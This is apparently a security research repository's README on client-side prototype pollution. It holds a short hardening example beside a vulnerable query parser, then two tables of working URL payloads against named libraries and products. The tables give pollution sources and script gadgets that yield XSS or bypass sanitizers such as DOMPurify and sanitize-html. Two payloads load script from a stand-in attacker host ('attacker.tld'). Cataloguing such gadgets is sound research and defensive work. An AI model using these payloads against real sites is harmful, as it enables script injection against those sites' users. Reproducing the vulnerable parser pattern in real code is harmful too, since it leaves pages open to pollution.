Client-Side Prototype Pollution


If you are unfamiliar with the Prototype Pollution attack, read the following first:
JavaScript prototype pollution attack in NodeJS by Olivier Arteau
Prototype pollution – and bypassing client-side HTML sanitizers by Michał Bentkowski

In this repository, I am collecting examples of libraries that are vulnerable to Prototype Pollution because of how they parse document.location, together with script gadgets that can be used to demonstrate the impact.
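As an added example (not code from this repository or from any library listed below), here is a minimal bracket-notation query-string parser of the kind these libraries implement, beside a hardened version that rejects prototype-reaching keys and parses onto null-prototype objects; `tokenize`, `deparamVulnerable`, `deparamHardened` and `pollutes` are names chosen here and `?__proto__[test]=test` is the probe payload from the table.

```javascript
// Added example, not the repository's code: vulnerable vs. hardened query parsing.

// Split "?a[b][c]=v&d=e" into [[["a","b","c"], "v"], [["d"], "e"]].
function tokenize(query) {
  return query.replace(/^\?/, "").split("&").filter(Boolean).map((pair) => {
    const eq = pair.indexOf("=");
    const rawKey = eq === -1 ? pair : pair.slice(0, eq);
    const rawVal = eq === -1 ? "" : pair.slice(eq + 1);
    const keys = decodeURIComponent(rawKey).split(/[\[\]]+/).filter(Boolean);
    return [keys, decodeURIComponent(rawVal)];
  });
}

// Vulnerable: for "__proto__[test]=test", cur["__proto__"] resolves to
// Object.prototype, so the final assignment lands on every object in the page.
function deparamVulnerable(query) {
  const result = {};
  for (const [keys, value] of tokenize(query)) {
    let cur = result;
    for (const k of keys.slice(0, -1)) {
      if (cur[k] === undefined) cur[k] = {};
      cur = cur[k];
    }
    cur[keys[keys.length - 1]] = value;
  }
  return result;
}

// Hardened: drop pairs whose path touches a prototype-reaching key and build on
// null-prototype objects, so there is no chain to climb even if a key slips through.
const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);
function deparamHardened(query) {
  const result = Object.create(null);
  for (const [keys, value] of tokenize(query)) {
    if (keys.length === 0 || keys.some((k) => FORBIDDEN_KEYS.has(k))) continue;
    let cur = result;
    for (const k of keys.slice(0, -1)) {
      if (typeof cur[k] !== "object" || cur[k] === null) cur[k] = Object.create(null);
      cur = cur[k];
    }
    cur[keys[keys.length - 1]] = value;
  }
  return result;
}

// Parse with `parser`, then report whether a fresh {} now inherits `probe`;
// the cleanup keeps later checks independent of this one.
function pollutes(parser, query, probe) {
  parser(query);
  try { return ({})[probe] !== undefined; } finally { delete Object.prototype[probe]; }
}
```

Running `pollutes(deparamVulnerable, "?__proto__[test]=test", "test")` in a page console is the same check a defender can use against a real parser: if it returns true, the parser is a pollution source regardless of which gadget is later chained to it.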

Prototype Pollution

| Name | Payload | Refs | Found by |
| --- | --- | --- | --- |
| Wistia Embedded Video (Fixed) | `?__proto__[test]=test` | [1] | William Bowling |
| jQuery query-object plugin | | | Sergey Bobrov |
| jQuery Sparkle | | | Sergey Bobrov |
| V4Fire Core Library | `?__proto__.test=test` | [1] | Sergey Bobrov |
| jQuery BBQ | | | Sergey Bobrov |
| MooTools More | | | Sergey Bobrov |
| Swiftype Site Search (Fixed) | `#__proto__[test]=test` | | s1r1us |
| CanJS deparam | `?__proto__[test]=test` | | Rahul Maini |
| Purl (jQuery-URL-Parser) | | | Sergey Bobrov |
| HubSpot Tracking Code (Fixed) | `?__proto__[test]=test` | | Sergey Bobrov |
| YUI 3 querystring-parse | `?constructor[prototype][test]=test` | | Sergey Bobrov |
| Mutiny | `?__proto__.test=test` | | SPQR |
| jQuery parseParams | `?__proto__.test=test` | | |
| php.js parse_str | `?__proto__[test]=test` | | |
| arg.js | `?__proto__[test]=test` | | |
| davis.js | `?__proto__[test]=test` | | POSIX |

Script Gadgets

| Name | Payload | Impact | Refs | Found by |
| --- | --- | --- | --- | --- |
| Wistia Embedded Video | `?__proto__[innerHTML]=<img/src/onerror=alert(1)>` | XSS | [1] | William Bowling |
| jQuery $.get | `?__proto__[context]=<img/src/onerror%3dalert(1)>` | XSS | | Sergey Bobrov |
| jQuery $.get >= 3.0.0 | `?__proto__[url][]=data:,alert(1)//` | XSS | | Michał Bentkowski |
| jQuery $.get >= 3.0.0 | `?__proto__[url]=data:,alert(1)//` | XSS | | Sergey Bobrov |
| jQuery $.getScript >= 3.4.0 | `?__proto__[src][]=data:,alert(1)//` | XSS | | s1r1us |
| jQuery $.getScript 3.0.0 - 3.3.1 | `?__proto__[url]=data:,alert(1)//` | XSS | | s1r1us |
| jQuery $(html) | `?__proto__[div][0]=1` | XSS | | Sergey Bobrov |
| jQuery $(x).off | `?__proto__[preventDefault]=x` | XSS | | Sergey Bobrov |
| Google reCAPTCHA | `?__proto__[srcdoc][]=<script>alert(1)</script>` | XSS | | s1r1us |
| Twitter Universal Website Tag | `?__proto__[hif][]=javascript:alert(1)` | XSS | | Sergey Bobrov |
| Tealium Universal Tag | `?__proto__[attrs][src]=1` | XSS | | Sergey Bobrov |
| Akamai Boomerang | `?__proto__[BOOMR]=1` | XSS | | s1r1us |
| Lodash <= 4.17.15 | `?__proto__[sourceURL]=%E2%80%A8%E2%80%A9alert(1)` | XSS | [1] | Alex Brasetvik |
| sanitize-html | `?__proto__[*][]=onload` | Bypass | [1] | Michał Bentkowski |
| sanitize-html | `?__proto__[innerText]=<script>alert(1)</script>` | Bypass | [1] | Hpdoger |
| js-xss | `?__proto__[whiteList][img][0]=onerror` | Bypass | [1] | Michał Bentkowski |
| DOMPurify <= 2.0.12 | `?__proto__[ALLOWED_ATTR][0]=onerror` | Bypass | [1] | Michał Bentkowski |
| DOMPurify <= 2.0.12 | `?__proto__[documentMode]=9` | Bypass | [1] | Michał Bentkowski |
| Closure | `?__proto__[*%20ONERROR]=1` | Bypass | [1] | Michał Bentkowski |
| Closure | `?__proto__[CLOSURE_BASE_PATH]=data:,alert(1)//` | XSS | [1] | Michał Bentkowski |
| Marionette.js / Backbone.js | `?__proto__[tagName]=img` | XSS | | Sergey Bobrov |
| Adobe Dynamic Tag Management | `?__proto__[src]=data:,alert(1)//` | XSS | | Sergey Bobrov |
| Swiftype Site Search | `?__proto__[xxx]=alert(1)` | XSS | | s1r1us |
| Embedly Cards | `?__proto__[onload]=alert(1)` | XSS | | Guilherme Keerok |
| Segment Analytics.js | `?__proto__[script][0]=1` | XSS | | Sergey Bobrov |
| Knockout.js | `?__proto__[4]=a':1,[alert(1)]:1,'b` | XSS | | Michał Bentkowski |
| Zepto.js | `?__proto__[onerror]=alert(1)` | XSS | [1] | lih3iu |
| Sprint.js | `?__proto__[div][intro]=<img%20src%20onerror%3dalert(1)>` | XSS | [1] | lih3iu |
| Vue.js | `?__proto__[v-if]=_c.constructor('alert(1)')()` | XSS | | POSIX |
| Vue.js | `?__proto__[attrs][0][name]=src` | XSS | [1] | s1r1us |
| Vue.js | `?__proto__[v-bind:class]=''.constructor.constructor('alert(1)')()` | XSS | [1] | r00timentary |
| Vue.js | `?__proto__[data]=a` | XSS | [1] | SuperGuesser |
| Vue.js | `?__proto__[props][][value]=a` | XSS | [1] | st98_ |
| Vue.js | `?__proto__[template]=<script>alert(1)</script>` | XSS | [1] | huli |
| Demandbase Tag | `?__proto__[Config][SiteOptimization][enabled]=1` | | | |
| @analytics/google-tag-manager | `?__proto__[customScriptSrc]=//attacker.tld/xss.js` | XSS | | SPQR |
| i18next | `?__proto__[lng]=cimode` | Potential XSS | | Sergey Bobrov |
| i18next < 19.8.5 | `?__proto__[lng]=a` | Potential XSS | | Sergey Bobrov |
| i18next >= 19.8.5 | `?__proto__[lng]=a` | Potential XSS | | Sergey Bobrov |
| Google Analytics | `?__proto__[cookieName]=COOKIE%3DInjection%3B` | Cookie Injection | | Sergey Bobrov |
| Popper.js | `?__proto__[arrow][style]=color:red;transition:all%201s` | XSS | [1] [2] | Matheus Vrech |
| Pendo Agent | `?__proto__[dataHost]=attacker.tld/js.js%23` | XSS | | Renwa |